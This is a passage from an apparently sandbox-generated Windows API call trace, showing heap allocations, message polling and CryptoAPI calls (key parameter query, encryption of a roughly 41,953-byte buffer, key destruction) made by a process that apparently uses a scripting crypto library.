hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1b8 | out: hHeap=0x770000) returned 1 [0044.015] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8897d8 [0044.015] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1b8 [0044.015] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce38 [0044.015] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1b8 | out: hHeap=0x770000) returned 1 [0044.015] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889220 [0044.015] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1b8 [0044.015] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1b8 | out: hHeap=0x770000) returned 1 [0044.015] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc70 [0044.015] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1b8 [0044.015] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ca00 [0044.015] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1b8 | out: hHeap=0x770000) returned 1 [0044.015] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x40) returned 0x7ab530 [0044.015] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1968 | out: hHeap=0x770000) returned 1 [0044.015] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c988 [0044.015] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1b8 [0044.015] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1968 [0044.015] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd78 [0044.015] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da248 [0044.015] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x14) returned 0x7ae948 [0044.016] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x44) returned 0x88e0e8 [0044.016] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c8f8 [0044.016] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da338 [0044.016] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8896b8 [0044.016] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da348 [0044.016] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da248 | out: hHeap=0x770000) returned 1 [0044.016] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cee0 [0044.016] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da248 [0044.016] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da248 | out: hHeap=0x770000) returned 1 [0044.016] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8896b8 | out: hHeap=0x770000) returned 1 [0044.016] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da348 | out: hHeap=0x770000) returned 1 [0044.016] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c8f8 | out: hHeap=0x770000) returned 1 [0044.016] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da338 | out: hHeap=0x770000) returned 1 [0044.016] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88e0e8 | out: hHeap=0x770000) returned 1 [0044.016] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae948 | out: hHeap=0x770000) returned 1 [0044.016] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd78 | out: hHeap=0x770000) returned 1 [0044.016] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cee0 | out: hHeap=0x770000) returned 1 [0044.016] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1968 | out: hHeap=0x770000) returned 1 [0044.016] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1b8 | out: hHeap=0x770000) returned 1 [0044.016] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cee0 [0044.016] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1b8 [0044.016] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd78 [0044.016] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1b8 | out: hHeap=0x770000) returned 1 [0044.016] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c8f8 [0044.016] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1b8 [0044.016] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1968 [0044.016] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8896b8 [0044.016] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da338 [0044.016] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x14) returned 0x7ae948 [0044.016] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x44) returned 0x88e0e8 [0044.016] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd90 [0044.016] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da348 [0044.016] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd00 [0044.016] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da248 [0044.017] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da338 | out: hHeap=0x770000) returned 1 [0044.017] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd30 [0044.017] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da338 [0044.017] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da338 | out: hHeap=0x770000) returned 1 [0044.017] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd00 | out: hHeap=0x770000) returned 1 [0044.017] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da248 | out: hHeap=0x770000) returned 1 [0044.017] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd90 | out: hHeap=0x770000) returned 1 [0044.017] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da348 | out: hHeap=0x770000) returned 1 [0044.017] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88e0e8 | out: hHeap=0x770000) returned 1 [0044.017] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae948 | out: hHeap=0x770000) returned 1 [0044.017] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8896b8 | out: hHeap=0x770000) returned 1 [0044.017] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd30 | out: hHeap=0x770000) returned 1 [0044.017] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1968 | out: hHeap=0x770000) returned 1 [0044.017] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1b8 | out: hHeap=0x770000) returned 1 [0044.017] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd30 [0044.017] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1b8 [0044.017] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8896b8 [0044.017] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1b8 | out: hHeap=0x770000) returned 1 [0044.017] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd90 [0044.017] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1b8 [0044.017] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1b8 | out: hHeap=0x770000) returned 1 [0044.017] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da1b8 [0044.017] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd00 [0044.017] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0044.017] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce08 [0044.017] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da348 [0044.017] CryptGetKeyParam (in: hKey=0x7c2280, dwParam=0x7, pbData=0x7da218, pdwDataLen=0x6adcf0, dwFlags=0x0 | out: pbData=0x7da218*=0x660e, pdwDataLen=0x6adcf0*=0x4) returned 1 [0044.017] PeekMessageW (in: lpMsg=0x6ae324, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae324) returned 0 [0044.017] PeekMessageW (in: lpMsg=0x6ae324, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae324) returned 0 [0044.017] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0044.018] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0044.018] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0044.018] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0044.018] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2300 | out: hHeap=0x770000) returned 1 [0044.018] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0044.018] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0044.018] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0044.018] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1b70 | out: hHeap=0x770000) returned 1 [0044.018] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da288 | out: hHeap=0x770000) returned 1 [0044.018] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0044.018] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0044.018] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0044.018] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2e8 | out: hHeap=0x770000) returned 1 [0044.018] PeekMessageW (in: lpMsg=0x6ae1c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae1c4) returned 0 [0044.018] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0044.018] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2300 | out: hHeap=0x770000) returned 1 [0044.018] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0044.018] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0044.018] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0044.018] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da288 | out: hHeap=0x770000) returned 1 [0044.018] PeekMessageW (in: lpMsg=0x6ae38c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae38c) returned 0 [0044.018] PeekMessageW (in: lpMsg=0x6ae38c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae38c) returned 0 [0044.018] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab530 | out: hHeap=0x770000) returned 1 [0044.018] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cca0 | out: hHeap=0x770000) returned 1 [0044.018] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0044.018] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0044.018] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0044.019] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0044.019] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2340 | out: hHeap=0x770000) returned 1 [0044.019] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0044.019] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0044.019] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0044.019] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da308 | out: hHeap=0x770000) returned 1 [0044.019] PeekMessageW (in: lpMsg=0x6ae1d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae1d4) returned 0 [0044.020] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0044.020] CryptEncrypt (in: hKey=0x7c2280, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x6ae220*=0xa3d6, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x6ae220*=0xa3e0) returned 1 [0044.020] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0044.020] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0044.020] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2340 | out: hHeap=0x770000) returned 1 [0044.020] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0044.020] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0044.020] CharLowerBuffW (in: lpsz="byte[41953]", cchLength=0xb | out: lpsz="byte[41953]") returned 0xb [0044.020] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0044.022] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0044.022] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0044.022] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0044.022] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1b8 | out: hHeap=0x770000) returned 1 [0044.022] PeekMessageW (in: lpMsg=0x6ae1d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae1d4) returned 0 [0044.023] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0044.023] CryptEncrypt (in: hKey=0x7c2280, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x935008*, pdwDataLen=0x6ae220*=0xa3d6, dwBufLen=0xa3e0 | out: pbData=0x935008*, pdwDataLen=0x6ae220*=0xa3e0) returned 1 [0044.023] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0044.023] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0044.023] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2340 | out: hHeap=0x770000) returned 1 [0044.023] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0044.025] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0044.025] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0044.025] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0044.025] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0044.025] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1be8 | out: hHeap=0x770000) returned 1 [0044.025] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da338 | out: hHeap=0x770000) returned 1 [0044.025] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0044.025] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0044.025] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0044.025] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da338 | out: hHeap=0x770000) returned 1 [0044.025] PeekMessageW (in: lpMsg=0x6ae38c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae38c) returned 0 [0044.025] PeekMessageW (in: lpMsg=0x6ae38c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae38c) returned 0 [0044.025] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab530 | out: hHeap=0x770000) returned 1 [0044.025] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce20 | out: hHeap=0x770000) returned 1 [0044.025] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0044.025] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0044.025] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0044.025] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1b8 | out: hHeap=0x770000) returned 1 [0044.025] PeekMessageW (in: lpMsg=0x6ae1c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae1c4) returned 0 [0044.026] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0044.026] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2300 | out: hHeap=0x770000) returned 1 [0044.026] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0044.026] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab380 | out: hHeap=0x770000) returned 1 [0044.026] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889aa8 | out: hHeap=0x770000) returned 1 [0044.026] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0044.030] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0044.030] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0044.030] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2300 | out: hHeap=0x770000) returned 1 [0044.030] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0044.033] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0044.034] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0044.034] CharUpperBuffW (in: lpsz="_CRYPT_DESTROYKEY", cchLength=0x11 | out: lpsz="_CRYPT_DESTROYKEY") returned 0x11 [0044.034] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0044.034] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da198 | out: hHeap=0x770000) returned 1 [0044.034] PeekMessageW (in: lpMsg=0x6aea4c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aea4c) returned 0 [0044.034] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0044.034] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0044.034] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da258 | out: hHeap=0x770000) returned 1 [0044.034] PeekMessageW (in: lpMsg=0x6ae3fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae3fc) returned 0 [0044.034] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0044.034] CryptDestroyKey (hKey=0x7c2280) returned 1 [0044.034] PeekMessageW (in: lpMsg=0x6aea4c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aea4c) returned 0 [0044.034] PeekMessageW (in: lpMsg=0x6aea4c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aea4c) returned 0 [0044.034] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0044.034] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1968 | out: hHeap=0x770000) returned 1 [0044.034] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da228 | out: hHeap=0x770000) returned 1 [0044.034] PeekMessageW (in: lpMsg=0x6ae7f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae7f4) returned 0 [0044.034] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0044.034] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0044.034] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da228 | out: hHeap=0x770000) returned 1 [0044.035] PeekMessageW (in: lpMsg=0x6ae59c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae59c) returned 0 [0044.035] PeekMessageW (in: lpMsg=0x6ae59c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae59c) returned 0 [0044.035] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab530 | out: hHeap=0x770000) returned 1 [0044.035] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd00 | out: hHeap=0x770000) returned 1 [0044.035] PeekMessageW (in: lpMsg=0x6ae7f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae7f4) returned 0 [0044.035] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0044.035] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0044.035] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da258 | out: hHeap=0x770000) returned 1 [0044.035] PeekMessageW (in: lpMsg=0x6ae3d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae3d4) returned 0 [0044.035] PeekMessageW (in: lpMsg=0x6ae7f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae7f4) returned 0 [0044.035] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2280 | out: hHeap=0x770000) returned 1 [0044.035] PeekMessageW (in: lpMsg=0x6ae7f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae7f4) returned 0 [0044.035] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab380 | out: hHeap=0x770000) returned 1 [0044.035] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce50 | out: hHeap=0x770000) returned 1 [0044.035] PeekMessageW (in: lpMsg=0x6aea4c, hWnd=0x0, 